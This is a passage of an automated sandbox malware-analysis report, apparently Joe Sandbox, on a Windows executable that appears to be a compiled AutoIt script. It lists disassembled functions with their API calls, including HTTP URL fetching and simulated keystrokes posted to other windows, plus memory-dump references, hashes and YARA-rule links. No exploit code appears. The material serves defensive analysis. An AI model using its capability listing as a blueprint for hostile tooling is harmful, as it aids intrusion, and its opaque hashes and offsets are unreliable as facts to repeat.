                        • CreatePopupMenu.USER32 ref: 003C3D2E
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003C3D5B
                        • DrawMenuBar.USER32 ref: 003C3D63
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                        • String ID: 0$F
                        • API String ID: 161812096-3044882817
                        • Opcode ID: 5b7ac8a325afb560152c3f053aeb4a9d1a80b2b070959cc40a574ceb75a214d3
                        • Instruction ID: 292b0ed4645cce2b5dfc9be98ade5e7ac90803390a47bea86ca1cbe88facf5c2
                        • Opcode Fuzzy Hash: 5b7ac8a325afb560152c3f053aeb4a9d1a80b2b070959cc40a574ceb75a214d3
                        • Instruction Fuzzy Hash: FF415975A01209AFDB15CF64D848FAA7BB9FF4A350F15402CE946E7360D731AE10CB94
                        Function 003C3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003C3A9D
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003C3AA0
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C3AC7
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003C3AEA
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003C3B62
                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 003C3BAC
                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 003C3BC7
                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 003C3BE2
                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 003C3BF6
                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 003C3C13
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow
                        • String ID:
                        • API String ID: 312131281-0
                        • Opcode ID: 26b5531d4a7ea3b957e06b9065284c0a13683d04dcfefc3ce1d7da5a74432f59
                        • Instruction ID: f2f70812aee2608e0b5ad3995fbe8d521817498e62f6b6a424d07b88d3379393
                        • Opcode Fuzzy Hash: 26b5531d4a7ea3b957e06b9065284c0a13683d04dcfefc3ce1d7da5a74432f59
                        • Instruction Fuzzy Hash: 38616B75900248AFDB11DFA8CD81FEE77B8EB09700F1081A9FA15EB2A1D774AE45DB50
                        Function 00362C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00362C94
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 00362CA0
                        • _free.LIBCMT ref: 00362CAB
                        • _free.LIBCMT ref: 00362CB6
                        • _free.LIBCMT ref: 00362CC1
                        • _free.LIBCMT ref: 00362CCC
                        • _free.LIBCMT ref: 00362CD7
                        • _free.LIBCMT ref: 00362CE2
                        • _free.LIBCMT ref: 00362CED
                        • _free.LIBCMT ref: 00362CFB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 4691296bc750b94a2409472ee81b0a70e260c9a0efe49d3b49088edeed79e8e1
                        • Instruction ID: 3b06803e0e14af01bb3303c2585da209a1c99ce02c6a4707cf5cadf7692a63c7
                        • Opcode Fuzzy Hash: 4691296bc750b94a2409472ee81b0a70e260c9a0efe49d3b49088edeed79e8e1
                        • Instruction Fuzzy Hash: 47119676600508AFCB07EF54D842CDE3BA5FF46390F4284A5F9485F226D731EA609B90
                        Function 00331410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                        Download Yara Rule
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00331459
                        • OleUninitialize.OLE32(?,00000000), ref: 003314F8
                        • UnregisterHotKey.USER32(?), ref: 003316DD
                        • DestroyWindow.USER32(?), ref: 003724B9
                        • FreeLibrary.KERNEL32(?), ref: 0037251E
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0037254B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 469580280-3243417748
                        • Opcode ID: 1c4691e45859780b1c1c7d08ee4119ab83111ed18a34432d5738318e4585a4a8
                        • Instruction ID: 4b768f951e3795bd90df95d18ca54036cf39d8376ed3f55238d0e5e88cec0a43
                        • Opcode Fuzzy Hash: 1c4691e45859780b1c1c7d08ee4119ab83111ed18a34432d5738318e4585a4a8
                        • Instruction Fuzzy Hash: D8D15A31701212CFDB2BEF15C899B2AF7A4BF05710F1582ADE84AAB251DB30AD52CF50
                        Function 00335BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                        Download Yara Rule
                        APIs
                        • SetWindowLongW.USER32(?,000000EB), ref: 00335C7A
                          • Part of subcall function 00335D0A: GetClientRect.USER32(?,?), ref: 00335D30
                          • Part of subcall function 00335D0A: GetWindowRect.USER32(?,?), ref: 00335D71
                          • Part of subcall function 00335D0A: ScreenToClient.USER32(?,?), ref: 00335D99
                        • GetDC.USER32 ref: 003746F5
                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00374708
                        • SelectObject.GDI32(00000000,00000000), ref: 00374716
                        • SelectObject.GDI32(00000000,00000000), ref: 0037472B
                        • ReleaseDC.USER32(?,00000000), ref: 00374733
                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003747C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                        • String ID: U
                        • API String ID: 4009187628-3372436214
                        • Opcode ID: 30ffac31c2a2a0a43e4347f36548b5ab555fd6af1fd3eaa210bc48d7670ccb51
                        • Instruction ID: 50679cf20b9d83c47f550d744b8dce5c36f311a6f197887ffa9e055e8895cbf7
                        • Opcode Fuzzy Hash: 30ffac31c2a2a0a43e4347f36548b5ab555fd6af1fd3eaa210bc48d7670ccb51
                        • Instruction Fuzzy Hash: 0671CF31400245DFCF378F64C984ABA7BB9FF4A314F198269E96A9A166C335A881DF50
                        Function 003A359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003A35E4
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • LoadStringW.USER32(00402390,?,00000FFF,?), ref: 003A360A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LoadString$_wcslen
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 4099089115-2391861430
                        • Opcode ID: 47b9a6862aa2d3e4bea148c068a5068b697ed0e31a90a1f4e963711dad95edc3
                        • Instruction ID: 616e476da83c5d6205f365b904c93e44b61844531304d77c23df3905afc7c6f3
                        • Opcode Fuzzy Hash: 47b9a6862aa2d3e4bea148c068a5068b697ed0e31a90a1f4e963711dad95edc3
                        • Instruction Fuzzy Hash: EF518F72900209BBDF16EBA0CD82EEDBB78EF05310F148125F5057A1A1EB711A99DFA0
                        Function 003AC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003AC272
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003AC29A
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003AC2CA
                        • GetLastError.KERNEL32 ref: 003AC322
                        • SetEvent.KERNEL32(?), ref: 003AC336
                        • InternetCloseHandle.WININET(00000000), ref: 003AC341
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                        • String ID:
                        • API String ID: 3113390036-3916222277
                        • Opcode ID: 09c6892ce8ccde329d1cea6e0fcfc2a752b85a8691a7ac748b358bdde0760697
                        • Instruction ID: 0dcb1599485d4e8ed1b3c741b4e68ff391984fc986a6e42a5a77ec6d00f078e0
                        • Opcode Fuzzy Hash: 09c6892ce8ccde329d1cea6e0fcfc2a752b85a8691a7ac748b358bdde0760697
                        • Instruction Fuzzy Hash: 98319FB5520204AFDB239F648C88EAB7BFCEB4A740F14A51EF44AD6640DB34ED059B60
                        Function 0039989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00373AAF,?,?,Bad directive syntax error,003CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 003998BC
                        • LoadStringW.USER32(00000000,?,00373AAF,?), ref: 003998C3
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00399987
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HandleLoadMessageModuleString_wcslen
                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                        • API String ID: 858772685-4153970271
                        • Opcode ID: 5bae579a15b3cd5f1d0844af559bcd77bbc01bf6ca3f2d5e431ce793eee5b58d
                        • Instruction ID: 42a86dfc067c3c54a7d03ea61ce84c158d1659c5e9059f88a98c2b74551bac8a
                        • Opcode Fuzzy Hash: 5bae579a15b3cd5f1d0844af559bcd77bbc01bf6ca3f2d5e431ce793eee5b58d
                        • Instruction Fuzzy Hash: 63212F3194021DABCF17AF90CC46EED7779FF18700F04945AF5156A0A1EB71AA18DB51
                        Function 0039209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32 ref: 003920AB
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 003920C0
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0039214D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassMessageNameParentSend
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 1290815626-3381328864
                        • Opcode ID: b41aa45aea91ccd190ebcc0eb90264b5c53843a904097938a9f7c589b7e9ad66
                        • Instruction ID: 810663421ba8956b222b796727817650dd32de253ea519d525e4fbe4e36f5108
                        • Opcode Fuzzy Hash: b41aa45aea91ccd190ebcc0eb90264b5c53843a904097938a9f7c589b7e9ad66
                        • Instruction Fuzzy Hash: 85112976688B0ABAFE072620DC0BDF7779CDB14329F210016FB04E91E1FE616C655614
                        Function 0036CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                        • String ID:
                        • API String ID: 1282221369-0
                        • Opcode ID: 7b5664ac40bf08d8950480ebab8685a7e4db928cb668a689bcef489946abea76
                        • Instruction ID: cc7e9303b79155c90e16e578a74a78baeb1aaf79681798ee472b03cda994e824
                        • Opcode Fuzzy Hash: 7b5664ac40bf08d8950480ebab8685a7e4db928cb668a689bcef489946abea76
                        • Instruction Fuzzy Hash: E1614A71A04301AFDB27AFB49C41B7A7BA5EF06350F06C16DF984AF249D7329D0187A0
                        Function 003C50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 003C5186
                        • ShowWindow.USER32(?,00000000), ref: 003C51C7
                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 003C51CD
                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 003C51D1
                          • Part of subcall function 003C6FBA: DeleteObject.GDI32(00000000), ref: 003C6FE6
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C520D
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C521A
                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003C524D
                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 003C5287
                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 003C5296
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                        • String ID:
                        • API String ID: 3210457359-0
                        • Opcode ID: 2e3559d66c1b37e77705442ec7fbfdc7b2e10e323fde04131ca4e7f09ed80f0f
                        • Instruction ID: bb8ca34b6e25b1bc27e653dcfc8d70e2ecfc47889d0f2d46607ab432b678e359
                        • Opcode Fuzzy Hash: 2e3559d66c1b37e77705442ec7fbfdc7b2e10e323fde04131ca4e7f09ed80f0f
                        • Instruction Fuzzy Hash: F351B130A50A08BEEF229F24CC4AFD97BA9EB05321F59441AF615DA2E1C775BDD0DB40
                        Function 00348B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00386890
                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003868A9
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003868B9
                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003868D1
                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003868F2
                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00348874,00000000,00000000,00000000,000000FF,00000000), ref: 00386901
                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0038691E
                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00348874,00000000,00000000,00000000,000000FF,00000000), ref: 0038692D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                        • String ID:
                        • API String ID: 1268354404-0
                        • Opcode ID: 99eb88ef82c564c2edca5600891d728ecbf5c1cba58701107ec02efccd694e46
                        • Instruction ID: 4753c51287c0d3330b7f10c7b0f505c3bc5d0f6e083dbdabdef7fc008520723c
                        • Opcode Fuzzy Hash: 99eb88ef82c564c2edca5600891d728ecbf5c1cba58701107ec02efccd694e46
                        • Instruction Fuzzy Hash: 22514970600305AFDB22DF25CC56FAA7BB9EB44750F104528F956DA2A0DB70E991DB50
                        Function 003AC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003AC182
                        • GetLastError.KERNEL32 ref: 003AC195
                        • SetEvent.KERNEL32(?), ref: 003AC1A9
                          • Part of subcall function 003AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003AC272
                          • Part of subcall function 003AC253: GetLastError.KERNEL32 ref: 003AC322
                          • Part of subcall function 003AC253: SetEvent.KERNEL32(?), ref: 003AC336
                          • Part of subcall function 003AC253: InternetCloseHandle.WININET(00000000), ref: 003AC341
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                        • String ID:
                        • API String ID: 337547030-0
                        • Opcode ID: 57d17a86eaef8aef3836bfccf98c291e9238b8a1cb137c1d724559e46298f0b1
                        • Instruction ID: b4a7cb2b55c1817c39263daf55ea6d469cfaa13dffd464c74ff99435e24916ba
                        • Opcode Fuzzy Hash: 57d17a86eaef8aef3836bfccf98c291e9238b8a1cb137c1d724559e46298f0b1
                        • Instruction Fuzzy Hash: 93319271220605AFDF229FA5DD44A66BBFCFF1A300F04681DF95AC6A11D731E814DBA0
                        Function 003925A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 003925BD
                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003925DB
                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003925DF
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 003925E9
                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00392601
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00392605
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0039260F
                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00392623
                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00392627
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                        • String ID:
                        • API String ID: 2014098862-0
                        • Opcode ID: 93044fb3aad5468c8b85b3c1024fa2cf923f9fd0855b41460a67abb36d52222b
                        • Instruction ID: a60c99f244a82fe7823acd25991b7a2366f235888459df3b575f258c94a34b4e
                        • Opcode Fuzzy Hash: 93044fb3aad5468c8b85b3c1024fa2cf923f9fd0855b41460a67abb36d52222b
                        • Instruction Fuzzy Hash: 8B01DF307A0610BBFB2167699C8AF5A7F5DDB4EB12F111001F358EE1E1C9E224448BAA
                        Function 00391803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00391449,?,?,00000000), ref: 0039180C
                        • HeapAlloc.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 00391813
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00391449,?,?,00000000), ref: 00391828
                        • GetCurrentProcess.KERNEL32(?,00000000,?,00391449,?,?,00000000), ref: 00391830
                        • DuplicateHandle.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 00391833
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00391449,?,?,00000000), ref: 00391843
                        • GetCurrentProcess.KERNEL32(00391449,00000000,?,00391449,?,?,00000000), ref: 0039184B
                        • DuplicateHandle.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 0039184E
                        • CreateThread.KERNEL32(00000000,00000000,00391874,00000000,00000000,00000000), ref: 00391868
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
